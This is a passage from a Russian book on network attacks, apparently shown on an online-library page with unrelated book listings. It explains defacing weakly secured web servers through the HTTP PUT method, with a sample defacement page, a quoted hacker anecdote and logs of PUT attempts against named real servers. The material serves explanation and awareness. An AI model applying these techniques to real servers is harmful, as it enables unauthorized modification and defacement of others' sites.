Чтение онлайн

на главную

Жанры

Техника сетевых атак
Шрифт:

· «BODY»

· Съел бобра - спас дерево!

· «HR»

· «H1»

· «CENTER»

· «IMG SRC="http://www.aport.ru/w_liven.gif"»

· Здесь был «A href="#"»Вася«/A»…

· «IMG SRC="http://www.aport.ru/w_liven.gif"»

· «/H1»

· «/BODY»

Если операция прошла успешно, главная страница в браузере Internet Explorer будет выглядеть так:

Рисунок 21 Так выглядит главная станица сервера после ее модификации

Это один из многочисленных способов, используемых злоумышленниками для модификации страничек плохо защищенных серверов в Internet. Такие в настоящее время необычайная редкость, тем не менее, приведенный ниже фрагмент убеждает, что они все-таки есть:

"И взбрело мне (по закрепившейся привычке) поглядеть степень защищенности и (самое главное) степень тупости админа. Для этого я стал юзать (что думаете???) свой любимый Нетскап 3.01 (Браузер Netscape Navigator поддерживает метод PUT, в отличие от Internet Explorer - К.К). Стал лазить по директориям и обнаружил очень странную для сегодняшнего дня вещь, а именно директории /scripts и /cgi-bin оказались открытыми"

«История о Забывчивости и Извращениях, или как маленький локальный Баг изменил ход дела» Story by DiGGertaL SpOOn (Оригинал статьи находится по адресу.

Дальше статья повествует, как наивный чукотский «вьюноша» манипулировал всеми «хакерскими» утилитами по очереди, ломясь в широко открытую дверь. Чтобы повторить его «подвиг» вовсе не обязательно устанавливать на своей машине Netscape Navigator. Можно воспользоваться, например, приложением «Microsoft Web Publishing», которое поддерживает закачку файлов на сервер по HTTP-протоколу всеми доступными способами:

Рисунок 22 Microsoft Web Publishing поддерживает метод POST необходимый для «заливки» документов на сервер

Однако чаще всего злоумышленнику под тем или иным предлогом в доступе будет отказано. Возможные мотивации - метод PUT запрещен; метод PUT разрешен, но нет прав записи в указанный файл (директорию); наконец, метод PUT разрешен, права записи есть, но требуется авторизация (ввод имени и пароля).

Ниже приведены протоколы трех последовательных попыток подключения к следующим серверам:http://dore.on.ru и http://195.161.42.222.

· PUT /index.html HTTP/1.0

·

· HTTP/1.1 405 Method Not Allowed

· Date: Sat, 15 Apr 2000 21:50:26 GMT

· Server: Apache/1.2.6

· Allow : GET, HEAD, OPTIONS, TRACE

· Connection: close

· Content-Type: text/html

·

· «HTML»

· «HEAD»

· «TITLE» 405 Method Not Allowed «/TITLE»

· «/HEAD»

· «BODY»

· «H1» Method Not Allowed «/H1»

· The requested method PUT is not allowed for the URL /index.html.«P»

· «/BODY»«/HTML»

· PUT /Index.html HTTP/1.0

·

· HTTP/1.1 403 Access Forbidden

· Server: Microsoft-IIS/4.0

· Date: Sat, 15 Apr 2000 22:04:25 GMT

· Content-Length: 495

· Content-Type: text/html

·

· «html»

· «head»

· «title»Error 403.3«/title»

· «/head»

· «body»

· «h2»HTTP Error 403«/h2»

· «p»«strong» 403.3 Forbidden: Write Access Forbidden «/strong»«/p»

· «p»This error can be caused if you attempt to upload to, or modify a file in, a

· directory that does not allow Write access.«/p»

· «p»Please contact the Web server's administrator if the problem persists.«/p»

· PUT /Index.htm HTTP/1.0

·

· HTTP/1.1 401 Access Denied

· WWW-Authenticate: NTLM

· WWW-Authenticate: Basic realm="195.161.42.222"

· Content-Length: 644

· Content-Type: text/html

·

· «html»

· «head»

· «title»Error 401.2«/title»

· «body»

· «h2»HTTP Error 401«/h2»

· «p»«strong»401.2 Unauthorized: Logon Faile d due to server configuration«/strong»

· «p»This error indicates that the credentials passed to the server do not match the

Популярные книги

Я же бать, или Как найти мать

Юнина Наталья
Любовные романы:
современные любовные романы
6.44
рейтинг книги
Я же бать, или Как найти мать

Новый Рал 2

Северный Лис
2. Рал!
Фантастика:
фэнтези
7.62
рейтинг книги
Новый Рал 2

Темный Патриарх Светлого Рода 5

Лисицин Евгений
5. Темный Патриарх Светлого Рода
Фантастика:
юмористическое фэнтези
аниме
5.00
рейтинг книги
Темный Патриарх Светлого Рода 5

Двойной запрет для миллиардера

Тоцка Тала
Любовные романы:
современные любовные романы
5.00
рейтинг книги
Двойной запрет для миллиардера

Все ведьмы – стервы, или Ректору больше (не) наливать

Цвик Катерина Александровна
1. Все ведьмы - стервы
Фантастика:
юмористическая фантастика
5.00
рейтинг книги
Все ведьмы – стервы, или Ректору больше (не) наливать

Ненастоящий герой. Том 1

N&K@
1. Ненастоящий герой
Фантастика:
боевая фантастика
попаданцы
рпг
5.00
рейтинг книги
Ненастоящий герой. Том 1

Смертник из рода Валевских. Книга 6

Маханенко Василий Михайлович
6. Смертник из рода Валевских
Фантастика:
фэнтези
рпг
аниме
6.25
рейтинг книги
Смертник из рода Валевских. Книга 6

Искушение генерала драконов

Лунёва Мария
2. Генералы драконов
Любовные романы:
любовно-фантастические романы
5.00
рейтинг книги
Искушение генерала драконов

Система Возвышения. (цикл 1-8) - Николай Раздоров

Раздоров Николай
Система Возвышения
Фантастика:
боевая фантастика
4.65
рейтинг книги
Система Возвышения. (цикл 1-8) - Николай Раздоров

Огни Аль-Тура. Завоеванная

Макушева Магда
4. Эйнар
Любовные романы:
любовно-фантастические романы
эро литература
5.00
рейтинг книги
Огни Аль-Тура. Завоеванная

Отверженный VII: Долг

Опсокополос Алексис
7. Отверженный
Фантастика:
городское фэнтези
альтернативная история
аниме
5.00
рейтинг книги
Отверженный VII: Долг

Береги честь смолоду

Вяч Павел
1. Порог Хирург
Фантастика:
фэнтези
попаданцы
рпг
5.00
рейтинг книги
Береги честь смолоду

(Противо)показаны друг другу

Юнина Наталья
Любовные романы:
современные любовные романы
эро литература
5.25
рейтинг книги
(Противо)показаны друг другу

Одиссея адмирала Кортеса. Тетралогия

Лысак Сергей Васильевич
Одиссея адмирала Кортеса
Фантастика:
попаданцы
альтернативная история
9.18
рейтинг книги
Одиссея адмирала Кортеса. Тетралогия